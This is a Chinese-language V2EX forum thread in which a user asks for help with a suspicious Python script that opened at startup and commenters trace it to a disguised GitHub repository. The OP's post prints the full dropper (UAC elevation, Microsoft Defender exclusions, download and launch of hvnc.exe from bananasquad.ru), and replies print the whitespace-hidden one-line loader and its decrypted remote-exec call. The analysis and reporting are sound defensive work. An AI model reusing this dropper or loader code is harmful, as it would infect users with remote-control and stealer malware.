V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
Jimmyisme
V2EX  ›  程序员

开机的时候自动用 vscode 打开了一段代码。ChatGPT 说是病毒??

  •  8
     
  •   Jimmyisme · 255 天前 · 7989 次点击
    这是一个创建于 255 天前的主题,其中的信息可能已经有所发展或是发生改变。

    代码传网盘了,有没有大佬能看看怎么办😭 https://www.alipan.com/s/ysPCcqoe5TT

    第一个文件名是 hvnc.py

    import os
    import subprocess
    script = """
    import os
    
    def create_and_run_bat_script():
        bat_script_content = '''
    @echo off
    set "filePath=%appdata%\Microsoft\emptyfile20947.txt"
    :: BatchGotAdmin
    :-------------------------------------
    REM  --> Check for permissions
        IF "%PROCESSOR_ARCHITECTURE%" EQU "amd64" (
    >nul 2>&1 "%SYSTEMROOT%\SysWOW64\cacls.exe" "%SYSTEMROOT%\SysWOW64\config\system"
    ) ELSE (
    >nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"
    )
    
    REM --> If error flag set, we do not have admin.
    if '%errorlevel%' NEQ '0' (
        echo Requesting administrative privileges...
        goto UACPrompt
    ) else ( goto gotAdmin )
    
    :UACPrompt
        echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs"
        set params= %*
        echo UAC.ShellExecute "cmd.exe", "/c ""%~s0"" %params:"=""%", "", "runas", 1 >> "%temp%\getadmin.vbs"
    
        "%temp%\getadmin.vbs"
        del "%temp%\getadmin.vbs"
        exit /B
    
    :gotAdmin
        pushd "%CD%"
        CD /D "%~dp0"
    :--------------------------------------    
    
    mkdir "C:\Windows\WinEmptyfold"
    powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.exe'"
    powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.dll'"
    powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension 'exe'"
    powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension 'dll'"
    powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:'"
    
    set "temp_file=%TEMP%\hahabonk.exe"
    
    powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://bananasquad.ru/hvnc.exe', '%temp_file%')"
    
    start "" "%temp_file%"
    del /q "%appdata%\Microsoft\runpython.py"
    '''
    
        temp_folder = os.environ.get('TEMP', '')
        if temp_folder:
            bat_script_path = os.path.join(temp_folder, 'temp_script.bat')
            with open(bat_script_path, 'w') as bat_file:
                bat_file.write(bat_script_content)
            os.system(bat_script_path)
        else:
            print("Failed to get the TEMP folder path.")
    
    if os.name == 'nt':
        folder_path = r"C:\Windows\WinEmptyfold"
        if os.path.exists(folder_path):
            exit()
        else:
            os.system('timeout 600')
            os.system('taskkill /f /im explorer.exe')
            create_and_run_bat_script()
            while True:
                os.system('timeout 5')
                if os.path.exists(folder_path):
                    os.system('start explorer.exe')
                    break
                else:
                    create_and_run_bat_script()
    """
    
    appdata = os.environ.get('APPDATA', '')
    if appdata:
        # create microsoft folder if it doesn't exist
        microsoft_folder = os.path.join(appdata, 'Microsoft')
        if not os.path.exists(microsoft_folder):
            os.mkdir(microsoft_folder)
        script_path = os.path.join(appdata, 'Microsoft', 'runpython.py')
        with open(script_path, 'w') as script_file:
            script_file.write(script)
    subprocess.Popen(['python', script_path], creationflags=subprocess.CREATE_NO_WINDOW)
    
    
    第 1 条附言  ·  255 天前
    喜大普奔,恶意 repo 已经 404 了
    62 条回复    2024-02-29 17:11:33 +08:00
    Jimmyisme
        1
    Jimmyisme  
    OP
       255 天前
    目前发现是在自启动中,但是我设置了 py 文件用 vscode 。可能就没有运行。
    ![]( )
    Jimmyisme
        2
    Jimmyisme  
    OP
       255 天前
    删除文件再 ctrl+z 撤回删除操作就被火绒拦截了。不是很懂为什么之前没有被发现。目前来看应该没什么大碍

    ![]( )
    WoneFrank
        3
    WoneFrank  
       255 天前   ❤️ 1
    一看就病毒啊,有突破 UAC ,还去这拉了个 exe: https://bananasquad.ru/hvnc.exe
    可以看 virustotal: https://www.virustotal.com/gui/domain/bananasquad.ru/relations
    AoEiuV020JP
        4
    AoEiuV020JP  
       255 天前   ❤️ 2
    有点搞笑了,投 python 病毒也不管电脑上有没有 python 环境,直接默认编辑器打开了,
    Jimmyisme
        6
    Jimmyisme  
    OP
       255 天前
    @WoneFrank 感谢,这方面的内容没有了解过,我看看有没有这个病毒的分析
    Jimmyisme
        7
    Jimmyisme  
    OP
       255 天前
    @AoEiuV020JP 幸好我默认设置.py 是用 vscode 打开。我发现我默认的 python 环境确实装了他这个脚本要运行的 fernet 库。😱
    Jimmyisme
        8
    Jimmyisme  
    OP
       255 天前
    @Jimmyisme #5
    这段代码劫持了剪贴板,然后这是我昨天遇到的问题。估计以及中招了
    ![]( )
    Jimmyisme
        9
    Jimmyisme  
    OP
       255 天前   ❤️ 21
    我知道是哪里来的了,真 nm 脑残啊
    https://github.com/maqrtineLzjulyie/spotify-check-premium/blob/main/main.py

    第一行的最后面。还有 nm 一段代码。艹了
    之前刷到在舍友的 for 循环后面偷偷加分号,乐子人终成乐子。妈的
    MidGap
        10
    MidGap  
       255 天前
    @Jimmyisme #9 6666666666666666666666666
    dier
        11
    dier  
       255 天前
    @Jimmyisme #9 这思路也是牛 B 。我点进去看了几眼都没看到问题,无意发现有水平滚动条,还那么长。。。
    M2K4
        12
    M2K4  
       255 天前 via Android
    吓得我赶紧把自动折行打开
    chackchackGO
        13
    chackchackGO  
       255 天前
    @Jimmyisme 为什么这个仓库有 4.5k 的 fork? 我没看明白
    morgan1freeman
        14
    morgan1freeman  
       255 天前
    @Jimmyisme #9 开源 也不是完全安全,还是得审核代码,问题太多了
    HFX3389
        15
    HFX3389  
       255 天前
    @Jimmyisme #8 说不定是比特币地址:D
    wkla
        16
    wkla  
       255 天前
    @Jimmyisme #9 Github 上老多这种装成盗版的病毒了。😂
    nekomiao
        17
    nekomiao  
       255 天前   ❤️ 1
    @chackchackGO fork 和 star 差这么多,明显是刷的
    inhzus
        18
    inhzus  
       255 天前
    速速打开 toggle word wrap
    Link99
        19
    Link99  
       255 天前
    牛逼 这干嘛用的啊 Fork 4.5k Star 6 ?
    Jimmyisme
        20
    Jimmyisme  
    OP
       255 天前 via Android
    @chackchackGO #13 到处害人
    ghjh
        21
    ghjh  
       255 天前 via Android
    @Jimmyisme 好家伙,我还寻思呢,咋手机 github 打开就一行 import os
    shinession
        22
    shinession  
       255 天前
    学到了一招, 还能这么玩的
    flyqie
        23
    flyqie  
       255 天前 via Android
    感谢分享,涨知识了,已向 github 举报
    xixixicat
        24
    xixixicat  
       255 天前
    @Jimmyisme 不是,这思路也太牛逼了吧
    wangkun025
        25
    wangkun025  
       255 天前
    已经举报给 GitHub 了。
    Les1ie
        26
    Les1ie  
       255 天前
    恶意代码部分:
    ```
    import os ;os.system('pip install cryptography');os.system('pip install fernet');os.system('pip install requests');from fernet import Fernet;import requests;exec(Fernet(b'yKpskffUwlXAGQtWJiXILDemLKDod4v8DpfKK3ClcHo=').decrypt(b'gAAAAABlv3l_ShNj4Sta_rsNaa9OI2cs0EyIBDdLPw6x4VVSxY9AYPGhGcOClTKrp_TBol_GE50_2GWBH3IfwUsOTJpM5PvjUgD939S4E75PGnNWs_qq9kk1mbhzcEuOumsWSm28OPbC6vs4CjgTliTihSbRedGIUvizU9JdEpFIQfkFU6sbmpBFR9kzI8ttiIoFqxLvEriZ6tvIumAuq_s-A65rXKflng=='))
    import requests
    import json
    ```
    利用超长的空格欺骗没有开启自动换行的编辑器,的确是未设想的添加后门的方式。这个方法究极简单却有用,稍有不慎我也可能中招了。
    CivAx
        27
    CivAx  
       255 天前
    这个藏的有意思,已经向 github report-abuse 了。
    noahlias
        28
    noahlias  
       255 天前
    看了一下 点开它的 fork 都是机器人
    都是 2 周前注册的 而且他们的 repo 都有这段代码哈哈 应该都是钓鱼的
    ohmyhaha
        29
    ohmyhaha  
       255 天前
    hvnc....按理解这个是远控用的呢
    HashV2
        30
    HashV2  
       255 天前
    @Jimmyisme #9 真的 6 啊 要是我估计也中招了
    Jimmyisme
        31
    Jimmyisme  
    OP
       255 天前
    ohmyhaha
        32
    ohmyhaha  
       255 天前
    @Jimmyisme 是的。在另外一个隐藏桌面。这样你直接用你的浏览器登录你已经登录的网站或者应用。有效绕过 OPT 和风控
    straydragon
        33
    straydragon  
       255 天前
    已举报, 这个思路很简单也很容易中招, 吓得直接开启自动折行了
    Rickkkkkkk
        34
    Rickkkkkkk  
       255 天前
    (这下知道代码规范里一行不能过长的道理了吧
    fyxtc
        35
    fyxtc  
       255 天前
    公共场合投毒啊,这些孙子
    NEPv5NA6R8R3Y11u
        36
    NEPv5NA6R8R3Y11u  
       255 天前
    加密部分代码:
    exec(requests.get('https://bananasquad.ru/paste').text.replace('<pre>','').replace('</pre>',''))

    从这个网站获取代码去除前后标签后执行
    NEPv5NA6R8R3Y11u
        37
    NEPv5NA6R8R3Y11u  
       255 天前


    https://paste.org.cn/ODrRp80p0c

    网站内容,会再次获取一个非常长的代码

    https://github.com/azgaresncf/bananasquad
    NEPv5NA6R8R3Y11u
        38
    NEPv5NA6R8R3Y11u  
       255 天前
    这个人应该是制作脚本的人,看描述是不像是恶性攻击,
    machenme
        39
    machenme  
       255 天前
    大概意思是先检测系统。如果是 NT 就执行,然后关闭 UAC ,获取管理员权限,然后下载一个那个 hvnc.exe 刚点进去被火绒杀了。建议删了吧
    病毒名称:TrojanSpy/MSIL.Stealer.dr
    病毒 ID:D7EE101A6EEFC320
    SoyaDokio
        40
    SoyaDokio  
       255 天前
    reported the repository.
    Jimmyisme
        41
    Jimmyisme  
    OP
       255 天前
    @Oohuo #38 这个人应该也是中毒了,给了一个删除的教程。
    kaleido
        42
    kaleido  
       255 天前
    楼上投诉好像生效了,fork 只有个位数了
    wpyfawkes
        43
    wpyfawkes  
       255 天前
    话说上个月到官网下 sqlmap 里面有个文件也被卡巴斯基报毒了
    makerbi
        44
    makerbi  
       255 天前
    我已经 report 了,Github 刚刚给我回复处理了
    qq316107934
        45
    qq316107934  
       255 天前
    report 得到答复了,不仅 repo 没了,号都被扬了,好
    Jimmyisme
        46
    Jimmyisme  
    OP
       255 天前
    这个病毒,我估计是我自己手贱,UAC 点了 yes 。这种情况下,杀毒软件是不是已经没有用了?还是说只是火绒太拉。已经准备考虑付费卡巴斯基了
    Levox
        47
    Levox  
       255 天前
    重装吧 doge
    Jimmyisme
        48
    Jimmyisme  
    OP
       255 天前
    @Levox 代码开源的,看得到操作了什么。删干净应该就可以了。
    silencil
        49
    silencil  
       255 天前
    这是什么项目?
    Levox
        50
    Levox  
       255 天前
    @Jimmyisme 不是说有 exe ?逆下 exe ?
    Jimmyisme
        51
    Jimmyisme  
    OP
       255 天前
    @Levox #50 exe 是 hvnc ,也是一个开源项目😂
    emma3
        52
    emma3  
       255 天前
    https://bananasquad.ru/hvnc.exe
    这个.exe 是什么东西?
    pujx233
        53
    pujx233  
       255 天前
    来晚了项目 404 了,github 上这个项目是干啥的?
    thinkm
        54
    thinkm  
       255 天前   ❤️ 4
    这个帖子我都打不开,关了杀软才能打开
    wangkun025
        55
    wangkun025  
       255 天前
    @pujx233 检查是不是 spotify 的 premium 账号
    jeffson
        56
    jeffson  
       255 天前 via Android
    666
    studyingss
        57
    studyingss  
       254 天前
    @thinkm 什么杀软这么强?
    CivAx
        58
    CivAx  
       254 天前
    @CivAx #27 收到 Github 邮件,已经 Take down 了。
    thinkm
        59
    thinkm  
       254 天前
    @studyingss 卡巴斯基
    qiaofanxing
        60
    qiaofanxing  
       254 天前 via Android
    卡巴斯基连网页都打不开,我用的远控没法关掉保护,只好拿手机看的帖子
    Jimmyisme
        61
    Jimmyisme  
    OP
       254 天前
    @qiaofanxing 刚买了半年的卡巴斯基。感觉弄得电脑好卡,之前软件都是秒开,现在都要等 2 秒以上。
    vainl1
        62
    vainl1  
       254 天前   ❤️ 1
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1675 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 29ms · UTC 16:48 · PVG 00:48 · LAX 08:48 · JFK 11:48
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.